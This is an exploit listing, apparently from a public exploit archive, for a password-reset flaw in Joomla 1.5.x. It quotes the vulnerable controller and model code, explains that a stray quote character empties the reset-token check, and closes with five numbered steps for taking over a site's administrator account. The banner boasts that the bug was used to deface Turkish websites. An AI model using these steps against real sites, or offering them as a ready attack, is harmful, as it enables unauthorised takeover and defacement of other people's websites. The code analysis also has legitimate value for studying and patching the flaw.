Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

2008-08-12T00:00:00
ID 1337DAY-ID-3527
Type zdt
Reporter d3m0n
Modified 2008-08-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
===============================================================



#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399
 
	function confirmreset()
	{
		// Check for request forgeries
		JRequest::checkToken() or die( 'Invalid Token' );

		// Get the input
		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
                  
		// Get the model
		$model = &$this->getModel('Reset');

		// Verify the token
		if ($model->confirmReset($token) === false)   < --- {2}
		{
			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
			return false;
		}

		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
	}
	
#####################################################################################
	
File : /components/com_user/models/reset.php

Line: 111-130 	
	
	
	
	function confirmReset($token)
	{
		global $mainframe;

		$db	= &JFactory::getDBO();
		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 

		// Verify the token
		if (!($id = $db->loadResult()))
		{
			$this->setError(JText::_('INVALID_TOKEN'));
			return false;
		}

		// Push the token and user id into the session
		$mainframe->setUserState($this->_namespace.'token',	$token);
		$mainframe->setUserState($this->_namespace.'id',	$id);

		return true;
	}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password




#  0day.today [2018-04-09]  #